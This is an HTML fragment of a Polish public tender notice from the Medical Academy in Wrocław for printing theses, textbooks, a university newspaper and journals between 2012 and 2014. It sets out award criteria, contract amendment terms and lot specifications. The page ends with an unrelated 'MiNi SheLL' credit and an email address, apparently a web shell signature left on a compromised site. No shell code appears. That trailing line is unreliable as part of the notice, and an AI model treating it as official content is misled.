<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - ocena wzoru publikacji - 20</li>
<li>3 - gwarantowany termin dostawy egz.sygnalnego - 10</li>
<li>4 - gwarantowany termin wykonania  nakładu - 20</li>
<li>5 - gwarantowany termin usunięcia stwierdzonych wad - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty wybranego Wykonawcy, w następującym zakresie:
a)	zmiana terminu realizacji zamówienia jednostkowego. 
Zmiana jest dopuszczalna w wypadku wystąpienia okoliczności, za które Wykonawca nie ponosi odpowiedzialności, skutkujących niemożnością dotrzymania przez niego terminu realizacji określonego w § 3 ust. 1 umowy. Wówczas termin ten może ulec przedłużeniu, nie więcej jednak niż o czas trwania tych okoliczności.
b)	 zmiana ustawowej wysokości stawki podatku VAT
Jeżeli w trakcie realizacji przedmiotu umowy nastąpi zmiana stawki podatku VAT dla dostaw należących do przedmiotu zamówienia, strony dokonają odpowiedniej zmiany wynagrodzenia umownego. 
c)  zmiana  cennika ofertowego usług (z Formularza ofertowego) nastąpi jeżeli wskaźnik inflacji GUS ogłoszony po roku 2012 będzie równy lub większy od 5%, wówczas strony uzgodnią  zmianę cennika  proporcjonalną do wzrostu wskaźnika GUS  oraz po roku 2013  jeżeli wskaźnik inflacji GUS ogłoszony po roku 2013 będzie równy lub większy od 5%, wówczas strony uzgodnią  zmianę cennika   proporcjonalną do wzrostu wskaźnika GUS.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.am.wroc.pl Link przetargi ZZP 2012 nr PN - 08/ 12.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.am.wroc.pl Link przetargi ZZP 2012 nr PN - 08/ 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2012 godzina 10:00, miejsce: Zespół ds. Zamówień Publicznych Akademii Medycznej we Wrocławiu, 50-368 Wrocław, ul. Mikulicza - Radeckiego 5; pokój 31/32.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część  A/ Rozprawy Habilitacyjne,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część  A/ Rozprawy Habilitacyjne,  
Format B5, ok. 30 pozycji, (ok. 300 ark. drukarskich).

Nakład 80 egz., Format B5, objętość ok. 10 ark. (1 ark. druk. = 16 stron B5)
w tym wersja wielobarwna ok. 5 ark. 
Oprawa broszurowa, kolor, karton 250 g + folia, papier offset 80 g

Materiały do druku są dostarczone na płycie CD w formacie plików PDF 
 
Wykonawca jest zobowiązany do osobistego odebrania plików PDF (płyty CD) z siedziby Zamawiającego.
Przed drukiem całego nakładu Zamawiający wymaga aby Wykonawca dostarczył osobiście do siedziby Wydawnictwa AM przy ul. Chałubińskiego 6a egzemplarz sygnalny i po jego ocenie oraz akceptacji nastąpi drukowanie pozostałych egzemplarzy. 
Realizacja  zamówienia w okresie od dnia  01.07.2012 - 30.06.2014 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.00.00-8, 79.82.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Ocena jakościowa wzorów publikacji - 20</li>
<li>3. Gwarantowany termin dostarczenia egz. sygnalnego - 10</li>
<li>4. Gwarantowany termin wykonania nakładu - 20</li>
<li>5. Termin usunięcia stwierdzonych wad - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część  B/ Podręczniki w miękkiej i twardej oprawie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część  B/ Podręczniki, 
Format B5,  ok. 24 pozycji, (ok. 360 ark. drukarskich);

Nakład 300 egz., Format B5, objętość ok. 15 ark. (1 ark. druk. = 16 stron B5)
w tym wersja wielobarwna ok. 5 ark. 

Dwa rodzaje podręczników:
1/ (wersja 1) oprawa broszurowa, karton 250 g kolor (kolor wg ustaleń 
z Zamawiającym) + folia, papier offset 80 g (12 pozycji)
2/ (wersja 2) oprawa twarda, szyta, kolor (kolor wg ustaleń 
z Zamawiającym) oklejana, papier offset 80 g (12 pozycji)

Materiały do druku są dostarczone na płycie CD w formacie plików PDF 
 
Wykonawca jest zobowiązany do osobistego odebrania plików PDF (płyty CD) z siedziby Zamawiającego.

Przed drukiem całego nakładu Zamawiający wymaga dostarczenia do siedziby
Wydawnictwa AM druków impozycyjnych oraz proofów okładki a następnie egzemplarza sygnalnego i po jego ocenie oraz akceptacji nastąpi drukowanie pozostałych egzemplarzy.   
Realizacja  zamówienia w okresie od dnia  01.07.2012 - 30.06.2014 r.
o	1. Cena - 40 
o	2. Ocena jakościowa wzorów - 20 
o	3. Gwarantowany termin dostarczenia egz. sygnalnego - 10 
o	4. Gwarantowany termin wykonania nakładu - 20 
o	5. Termin usunięcia stwierdzonych wad - 10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.00.00-8, 79.82.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Ocena jakościowa wzorów publikacji - 20</li>
<li>3. Gwarantowany termin dostarczenia egz. sygnalnego - 10</li>
<li>4. Gwarantowany termin wykonania nakładu - 20</li>
<li>5. Termin usunięcia stwierdzonych wad - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część C/ Gazeta Uczelniana,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część C/ Gazeta Uczelniana, 
Format A 4, ok. 26 numerów (ok. 91 ark. drukarskich)
Nakład 500 egz., Format A4, (1 arkusz drukarski = 8 stron A4) 
Objętość od 3 do 4 ark. drukarskich (24-32 strony) 

Papier kreda 115 g, okładka kreda dwustronna 190 g, pełen kolor

Materiały do druku są dostarczone na płycie CD w formacie plików PDF.

Wykonawca jest zobowiązany do osobistego odebrania plików PDF 
(płyty CD) z siedziby Zamawiającego.

Zamawiający zastrzega możliwość wprowadzania zmian w granicach ? 5% całego zamówienia 
Realizacja  zamówienia w okresie od dnia   zawarcia umowy do  dnia 30.06.2014 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.00.00-8, 79.82.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Ocena jakościowa wzorów - 20</li>
<li>3. Gwarantowany termin dostarczenia egz. sygnalnego - 10</li>
<li>4. Gwarantowany termin wykonania nakładu - 20</li>
<li>5. Termin usunięcia stwierdzonych wad - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część D/ Czasopisma naukowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część D/ Czasopisma naukowe 
Format A4; 36 numerów; (ok. 576 ark. drukarskich)
Nakład 18 numerów 200 egz., 18 numerów 100 egz.
Format A4, (1 arkusz drukarski = 8 stron A4)

Objętość po ok. 16 arkuszy drukarskich, w tym ok. 5 arkuszy drukarskich kolor
Oprawa karton kredowy 250 g z kolorowym nadrukiem + folia
Papier: kreda 100 g, 

Materiały do druku są dostarczone na płycie CD w formacie plików PDF 
 
Wykonawca jest zobowiązany do osobistego odebrania plików PDF (płyty CD) z siedziby Zamawiającego.

Zamawiający zastrzega możliwość wprowadzania zmian w granicach ? 5% całego zamówienia 

Przed drukiem całego nakładu Zamawiający wymaga od Wykonawcy dostarczenia do siedziby zamawiającego egzemplarza sygnalnego i po jego ocenie oraz akceptacji nastąpi drukowanie pozostałych egzemplarzy. 

Realizacja  zamówienia w okresie od dnia  01.07.2012 - 30.06.2014 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.00.00-8, 79.82.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Ocena jakościowa wzorów  publikacji - 20</li>
<li>3. Gwarantowany termin dostarczenia egz. sygnalnego - 10</li>
<li>4. Gwarantowany termin wykonania nakładu - 20</li>
<li>5. Termin usunięcia stwierdzonych wad - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com